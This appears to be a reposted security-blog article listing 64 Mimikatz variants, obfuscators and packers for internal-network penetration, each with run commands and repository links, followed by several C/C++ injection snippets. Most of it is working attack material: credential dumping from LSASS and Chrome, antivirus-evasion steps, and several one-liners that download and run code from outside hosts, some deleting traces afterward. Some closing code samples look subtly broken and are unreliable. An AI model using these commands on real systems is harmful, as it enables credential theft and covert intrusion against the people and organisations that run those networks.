[Tool Share] 64 Mimikatz Tools for Internal Network Penetration

admin, 2024-05-19 01:23:45
  • 0x01 Disclaimer

Do not use any of the technical information or code tools provided in this article for illegal testing or unlawful activity. Any direct or indirect consequences or losses caused to any computer system by a user applying the technical information or code tools in this article are the sole responsibility of that user. The technical information and code tools provided here are for learning purposes only; any adverse consequences are unrelated to the author. Users must comply with laws and regulations and respect the legitimate rights of others.

  • 0x02 Tool Overview

(1) go-mimikatz

go build
./go-mimikatz

https://github.com/vyrus001/go-mimikatz

(2) Rusty Mimikatz

cargo build --release
./target/release/mimikatz-rs

https://github.com/memN0ps/mimikatz-rs

(3) MimikatzFUD

.\Invoke-M1m1fud2.ps1

https://github.com/HernanRodriguez1/MimikatzFUD

(4) pypykatz

pip install -r requirements.txt
python pypykatz.py
python pypykatz.py lsa minidump -d ./lsass.dmp sekurlsa::logonpasswords
python pypykatz.py wmi "SELECT * FROM Win32_Process WHERE Name='lsass.exe'" sekurlsa::logonpasswords

https://github.com/skelsec/pypykatz

(5) BetterSafetyKatz

.\BetterSafetyKatz.exe --DumpCreds
.\BetterSafetyKatz.exe --Minidump "C:\Windows\Temp\lsass.dmp" --DumpCreds
.\BetterSafetyKatz.exe --RemoteWMI -Target "192.168.1.100" -Username "domain\username" -Password "password123" --DumpCreds
.\BetterSafetyKatz.exe --RemoteSMB -Target "192.168.1.100" -Username "domain\username" -Password "password123" --DumpCreds

https://github.com/Flangvik/BetterSafetyKatz

(6) CopyCat

.\CopyCat.exe --dump --local
.\CopyCat.exe --memory "C:\Windows\Temp\memdump.raw" --dump
.\CopyCat.exe --hibernation "C:\Windows\hiberfil.sys" --dump
.\CopyCat.exe --dump --target "192.168.1.100" --username "domain\username" --password "password123"

https://github.com/mobdk/CopyCat

(7) PyFuscation

python3 PyFuscation.py -fvp --ps ./Scripts/Invoke-Mimikatz.ps1

https://github.com/CBHue/PyFuscation

(8) Invoke-Cats

Invoke-Cats -pwds
Invoke-Cats -certs
Invoke-Cats -CustomCommand

https://github.com/DanMcInerney/Invoke-Cats

(9) WinBoost

csc.exe /platform:x64 /target:exe /unsafe winboost.cs

https://github.com/mobdk/WinBoost

(10) mimidogz

.\Invoke-Mimidogz.ps1

https://github.com/fir3d0g/mimidogz

(11) CoreClass

"Add" > "Existing Item". Navigate to the `CoreClass` directory and select all the `.cs` files.
Add a reference to `System.Management.Automation.dll` in your project. To do this, right-click on your project in the solution explorer and select "Add" > "Reference". In the "Reference Manager" window, select "Assemblies" and search for "System.Management.Automation". Select it and click "Add".

https://github.com/mobdk/CoreClass

(12) SharpMimikatz

SharpMimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"

https://github.com/XTeam-Wing/SharpMimikatz

(13) Invoke-Obfuscation

Set-ExecutionPolicy Unrestricted
Import-Module .\Invoke-Obfuscation.psd1
Invoke-Obfuscation -ScriptPath C:\Path\To\MyScript.ps1 -Command All

https://github.com/danielbohannon/Invoke-Obfuscation

(14) SimpleMimikatzObfuscator

Commands.txt

https://github.com/DimopoulosElias/SimpleMimikatzObfuscator

(15) ClickOnceKatz

pip install pycryptodome requests
python build.py
Host the "publish" directory on a web server or file share accessible to the target machine.
On the target machine, navigate to the URL of the ClickOnce package in a web browser.

https://github.com/sinmygit/ClickOnceKatz

(16) pymemimporter

import base64
import pymemimporter

# Load the base64-encoded module into memory
encoded_module = b'YOUR_BASE64_ENCODED_MODULE_HERE'
module_data = base64.b64decode(encoded_module)

# Import the module from memory
mem_importer = pymemimporter.PyMemImporter()
loaded_module = mem_importer.load_module('<module_name>', module_data)

base64 -w0 <module_name>.py > <module_name>.base64
python <script_name>.py

https://github.com/n1nj4sec/pymemimporter

(17) SharpDPAPI

dotnet run --project .\SharpDPAPI\SharpDPAPI.csproj
dotnet run --project .\SharpDPAPI\SharpDPAPI.csproj masterkeys
dotnet run --project .\SharpDPAPI\SharpDPAPI.csproj domainbackupkeys

https://github.com/GhostPack/SharpDPAPI

(18) Plog

privilege::debug
sekurlsa::Plog

https://github.com/GamehunterKaan/Plog

(19) StegoKatz

.\StegoKatz.ps1 -Embed -FilePath <file_path> -ImagePath <image_path> -OutputPath <output_path>
.\StegoKatz.ps1 -Extract -ImagePath stego_image.jpg -OutputPath extracted_secret.txt

https://github.com/r13mann/StegoKatz

(20) LoadMimikatzWithDinvoke.cs

mimi.bat
rundll32-hijack.ps1

https://github.com/farzinenddo/SeveralWaysToExecuteMimikatz/blob/main/LoadMimikatzWithDinvoke.cs

(21) mimikatz-bypass

Invoke-WebRequest https://raw.githubusercontent.com/corneacristian/mimikatz-bypass/master/mimikatz-bypass.ps1 -OutFile mimikatz-bypass.ps1
Set-ExecutionPolicy Unrestricted
.\mimikatz-bypass.ps1

https://github.com/corneacristian/mimikatz-bypass

(22) Utils

dotnet build -r win10-x64
katz.exe <MIMIKATZ_COMMAND>

https://github.com/ITh4cker/Utils

(23) Eyeworm

python3 eyeworm.py -t <PAYLOAD_TYPE> -c <COMMAND> -o <OUTPUT_FILE>
python3 eyeworm.py -i <INPUT_FILE> -p <PAYLOAD_FILE> -o <OUTPUT_FILE>

https://github.com/imsellbaox/Eyeworm

(24) drunkenkatz

beacon> execute-assembly /root/drunkencat.exe -i -g -k -c "python drunkenkatz.py"

https://github.com/ap3r/drunkenkatz

(25) CallBack

python3 CallBack.py -i <LOCAL_IP_ADDRESS> -p <LOCAL_PORT>

https://github.com/mobdk/CallBack

(26) mimikatz-byPass-Huorong

python mimikatz_byPass_Huorong.py

https://github.com/q1ya/mimikatz-byPass-Huorong

(27) mimikatz_bypass

python mimikatz_bypass.py

https://github.com/wangfly-me/mimikatz_bypass

(28) HTML-mimikatz-

cmd.exe mimikatz.html

https://github.com/vipserver/HTML-mimikatz-

(29) Mimikatz.exe-in-JS

cmd.exe mimikatz.js

https://github.com/hardw00t/Mimikatz.exe-in-JS

(30) -Have-You-Seen-These-Katz-

sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1
sed -i -e "s/-Win32Functions \$Win32Functions$/-Win32Functions \$Win32Functions #-/g" Invoke-Mimikatz.ps1

https://github.com/Ninja-Tw1sT/-Have-You-Seen-These-Katz-

(31) MimiRunner

rundll32 *.log,#1

https://github.com/mobdk/MimiRunner

(32) Mimikatz-PE-Injection

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*

*** In the above command '/out:katz.exe katz.cs' the 'katz.cs' should be the path where initially powershell downloads the CS file ***

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/analyticsearch/7b614f8badabe5bedf1d88056197db76/raw/13966117e4ba13be5da0c4dc44ac9ebfd61fe22a','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe \\share_ip\share_name\katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*

cd %temp% && powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/analyticsearch/7b614f8badabe5bedf1d88056197db76/raw/13966117e4ba13be5da0c4dc44ac9ebfd61fe22a','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe %temp%\katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.* && move mimikatz.log %temp%\katz.log && cd %temp% && del %temp%\katz.cs

https://github.com/analyticsearch/Mimikatz-PE-Injection

(33) ninifox

.\Invoke-NiNifox.ps1

https://github.com/scottjosh/ninifox

(34) Chexport

dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data For Account" /unprotect
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect

https://github.com/GamehunterKaan/Chexport

(35) mimik

mimikatz.exe
mprotected.exe
mprotected.jpg.exe
mprotected.jpg.7z

https://github.com/MisterLobster22/mimik

(36) my-obfuscated-mimikatz

eric.ps1

https://github.com/lazaars/my-obfuscated-mimikatz

(37) Invoke-Mimikatz-W10

.\Invoke-Mimikatz.ps1

https://github.com/VDA-Labs/Invoke-Mimikatz-W10

(38) MimiVader

python3 MimiVader.py Invoke-Mimikatz.ps1 DeceptiveFile.py

https://github.com/lawja/MimiVader

(39) Invoke-Mimikatz

.\Invoke-Mimikatz

https://github.com/syn-ack-zack/Invoke-Mimikatz

(40) Invoke-Mimikatz

.\invokemimikatz.ps1

https://github.com/dfirdeferred/Invoke-Mimikatz

(41) mimikatz_bypass

.\XInvoke-Mimikatz.ps1
.\wi10_Invoke-Mimikatz.ps1

https://github.com/izj007/mimikatz_bypass

(42) JS_MimiKatzDropper

cscript.exe dropper.js

https://github.com/leinn32/JS_MimiKatzDropper

(43) mimicats

Invoke-Expression (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/Moon1705/mimicats/master/Mimicats.ps1')
Invoke-Cats -Command '"privilege::debug"'

https://github.com/Moon1705/mimicats

(44) XorPacker

python3 ./xorpacker.py -f mimikatz.exe -t UNMANAGED

https://github.com/tmenochet/XorPacker

(45) PEzor

PEzor.sh -fluctuate=RW -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"coffee" "sleep 5000" "coffee" "exit"'

https://github.com/phra/PEzor

(46) AtomPePacker

PePacker.exe mimikatz.exe -e

https://github.com/NUL0x4C/AtomPePacker

(47) Nim-RunPE

nim c -d:args NimRunPE.nim

https://github.com/S3cur3Th1sSh1t/Nim-RunPE

(48) Nimcrypt2

nim c -d:release nimcrypt2.nim
./nimcrypt2 --encrypt --keyfile=mykey.txt --inFile=plaintext.txt --outFile=ciphertext.txt

https://github.com/icyguider/Nimcrypt2

(49) ProtectMyTooling

py ProtectMyTooling.py hyperion,upx mimikatz.exe mimikatz-obf.exe

https://github.com/mgeeky/ProtectMyTooling

(50) xencrypt

Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1

https://github.com/the-xentropy/xencrypt

(51) BetterXencrypt

Import-Module ./betterxencrypt.ps1
Invoke-BetterXencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1

https://github.com/GetRektBoy724/BetterXencrypt

(52) AES-Encoder

Invoke-AES-Encoder -InFile invoke-mimikatz.ps1 -OutFile aesmimi.ps1

https://github.com/Chainski/AES-Encoder

(53) mortar

./encryptor -f mimikatz.exe -o bin.enc
deliver.exe -d -c sekurlsa::logonpasswords -f bin.enc

https://github.com/0xsp-SRD/mortar

(54) .NET-Crypter

Browse Executable:
Generate Encryption:

https://github.com/roast247/.NET-Crypter

(55) Custom mods + Invoke-Obfuscation

sed -e '/<#/,/#>/c\' "$1"
sed -e 's/^[[:space:]]*#.*$//g' "$1"
sed -e 's/Invoke-Mimikatz/RainbowsAndUnicorns/g' "$1"
sed -e 's/DumpCreds/MoreRainbows/g' "$1"
Invoke-Obfuscation -ScriptPath './Invoke-Mimikatz.ps1' -Command 'Token\All\1,Out full_power.ps1' -Quiet
Invoke-Obfuscation -ScriptPath '.\2.IM_critical_words.ps1' -Command 'Token\Variable\1' -Quiet > final.ps1
IEX (New-Object Net.Webclient).Downloadstring('http://192.168.1.104:8000/final.ps1'); RainbowsAndUnicorns -MoreRainbows

https://github.com/newlog/fud_mimikatz_talk

(56) Obfuscated_Invoke-Mimikatz

sed -i -e 's/Invoke-Mimikatz/Invoke-LSASSscraper/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e "s/-Win32Functions \$Win32Functions$/-Win32Functions \$Win32Functions#-/g" Invoke-Mimikatz.ps1
Install-Module -Name "ISESteroids" -Scope CurrentUser -Repository PSGallery -Force
Import-Module .\obfuscat_Invoke-Mimikatz.ps1
Invoke-LSASSscraper

https://github.com/VraiHack/Obfuscated_Invoke-Mimikatz

(57) mimikatz_encoded

certutil -decode mimikatz_encoded.bin mimikatz.exe && mimikatz.exe "sekurlsa::logonPasswords full" exit

https://github.com/mobx26/mimikatz_encoded

(58) Encrypted_Mimikatz

.\decrypt.ps1
.\mimikatz.exe "sekurlsa::logonPasswords full" exit

https://github.com/Sombody101/Encrypted_Mimikatz

(59) SigThief

sigthief.py -i c:\Windows\System32\consent.exe -t mimikatz.exe -o MSCredentialTool.exe

https://github.com/secretsquirrel/SigThief

(60) memory + suspended

#include <stdio.h>
#include <windows.h>

const char* cmd = "powershell.exe -windowstyle hidden -command \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/gentilkiwi/mimikatz/master/mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\"";

void obfuscate(char* str)
{
    int len = strlen(str);
    for (int i = 0; i < len; i++) {
        str[i] = str[i] ^ 0x41;
    }
}

int main()
{
    char* encoded_cmd = "YWxpY2UgY29tbWFuZCAtIHdpbmRvd3N0eWxlIGhpZGRlbjsgLWNvbW1hbmQgIklFWCAoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9yYXdAZ2VudGlsa2l3aS9taW1pa2F0ei9tZXRhZGF0YS9taW1pa2F0ei5wczEnKTsgSW52b2tlLU1pbWlrYXR6IC1EdW1wQ3JlZHMK";
    obfuscate(encoded_cmd);

    DWORD pid = GetCurrentProcessId();
    HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (process == NULL) {
        printf("Error opening process. Error code: %lu\n", GetLastError());
        return 1;
    }

    LPVOID remote_string = VirtualAllocEx(process, NULL, strlen(encoded_cmd), MEM_COMMIT, PAGE_READWRITE);
    if (remote_string == NULL) {
        printf("Error allocating memory. Error code: %lu\n", GetLastError());
        CloseHandle(process);
        return 1;
    }

    BOOL write_result = WriteProcessMemory(process, remote_string, encoded_cmd, strlen(encoded_cmd), NULL);
    if (!write_result) {
        printf("Error writing to process memory. Error code: %lu\n", GetLastError());
        CloseHandle(process);
        return 1;
    }

    HANDLE thread = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, remote_string, 0, NULL);
    if (thread == NULL) {
        printf("Error creating remote thread. Error code: %lu\n", GetLastError());
        CloseHandle(process);
        return 1;
    }

    WaitForSingleObject(thread, INFINITE);
    VirtualFreeEx(process, remote_string, strlen(encoded_cmd), MEM_RELEASE);
    CloseHandle(process);
    return 0;
}

(61) XOR with 0xFF

#include <iostream>
#include <cstring>

using namespace std;

void obfuscate(char* s) {
    for (int i = 0; s[i]; i++) {
        s[i] = s[i] ^ 0xFF;
    }
}

int main() {
    char* str = new char[20];
    strcpy(str, "password123");

    // Obfuscate the string
    obfuscate(str);
    // Print the obfuscated string
    cout << str << endl;

    // Restore the original string
    obfuscate(str);
    // Print the original string
    cout << str << endl;

    delete[] str;
    return 0;
}

(62) XOR each character with 0xAA

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>  /* needed for VirtualAlloc and the MEM_*/PAGE_* constants */

int main()
{
  char str1[] = "mimikatz.exe";
  char str2[] = "powershell.exe";
  char str3[] = "cmd.exe /c mimikatz.exe";
  int len1 = strlen(str1);
  int len2 = strlen(str2);
  int len3 = strlen(str3);

  for(int i = 0; i < len1; i++) {
    str1[i] = str1[i] ^ 0xAA;
  }
  for(int i = 0; i < len2; i++) {
    str2[i] = str2[i] ^ 0xAA;
  }
  for(int i = 0; i < len3; i++) {
    str3[i] = str3[i] ^ 0xAA;
  }

  void* mem = VirtualAlloc(NULL, sizeof(str1) + sizeof(str2) + sizeof(str3), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  memcpy(mem, str1, sizeof(str1));
  memcpy((char*)mem + sizeof(str1), str2, sizeof(str2));
  memcpy((char*)mem + sizeof(str1) + sizeof(str2), str3, sizeof(str3));
  ((void(*)())mem)();
  return 0;
}

(63) Decode and store in memory

#include <iostream>
#include <windows.h>

int main()
{
    const char* encodedCmd = "\x44\x43\x4D\x53\x63\x72\x61\x70\x00\x2D\x61\x20\x2D\x6E\x6F\x70\x62\x00\x2D\x6E\x6F\x70\x23\x00\x2D\x6E\x6F\x70\x69\x00\x2D\x61\x20\x2D\x6E\x6F\x70\x77\x00\x2D\x70\x00\x2D\x65\x00\x2D\x74\x00\x2D\x72\x00\x2D\x75\x00\x2D\x6E\x00\x20\x22\x26\x28\x2A\x2C\x2E\x30\x32\x34\x36\x38\x3A\x3C\x3E\x40\x42\x44\x46\x48\x4A\x4C\x4E\x50\x52\x54\x56\x58\x5A\x5C\x5E\x60\x62\x64\x66\x68\x6A\x6C\x6E\x70\x72\x74\x76\x78\x7A\x7C\x7E\x80\x82\x84\x86\x88\x8A\x8C\x8E\x90\x92\x94\x96\x98\x9A\x9C\x9E\xA0\xA2\xA4\xA6\xA8\xAA\xAC\xAE\xB0\xB2\xB4\xB6\xB8\xBA\xBC\xBE\xC0\xC2\xC4\xC6\xC8\xCA\xCC\xCE\xD0\xD2\xD4\xD6\xD8\xDA\xDC\xDE\xE0\xE2\xE4\xE6\xE8\xEA\xEC\xEE\xF0\xF2\xF4\xF6\xF8\xFA\xFC\xFE\x00\x22";

    DWORD pid;
    HWND hwnd = FindWindowA(NULL, "Window Name");
    GetWindowThreadProcessId(hwnd, &pid);
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

    LPVOID allocSpace = VirtualAllocEx(hProc, NULL, strlen(encodedCmd), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProc, allocSpace, encodedCmd, strlen(encodedCmd), NULL);
    HANDLE hThread = CreateRemoteThread(hProc, NULL, NULL, (LPTHREAD_START_ROUTINE)allocSpace, NULL, NULL, NULL);

    CloseHandle(hThread);
    CloseHandle(hProc);
    return 0;
}

(64) Running Mimikatz from memory

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MIMIKATZ_PATH "C:\\path\\to\\mimikatz.exe"

int main()
{
    // Load Mimikatz into memory
    HANDLE hFile = CreateFileA(MIMIKATZ_PATH, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    DWORD dwFileSize = GetFileSize(hFile, NULL);
    BYTE* pbFileData = (BYTE*)malloc(dwFileSize);
    DWORD dwBytesRead;
    ReadFile(hFile, pbFileData, dwFileSize, &dwBytesRead, NULL);
    CloseHandle(hFile);

    // Allocate memory for Mimikatz
    LPVOID lpMem = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    // Copy Mimikatz to allocated memory
    memcpy(lpMem, pbFileData, dwFileSize);

    // Execute Mimikatz
    DWORD dwExitCode;
    DWORD dwThreadId;
    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpMem, NULL, 0, &dwThreadId);
    WaitForSingleObject(hThread, INFINITE);
    GetExitCodeThread(hThread, &dwExitCode);

    // Free allocated memory
    VirtualFree(lpMem, 0, MEM_RELEASE);
    return 0;
}

Originally published on the WeChat official account Matrix SEC: 【工具分享】64款Mimikatz内网渗透利器

  • Reposts should keep the link to this article (CN-SEC 中文网, with thanks to the original author): https://cn-sec.com/archives/2037540.html
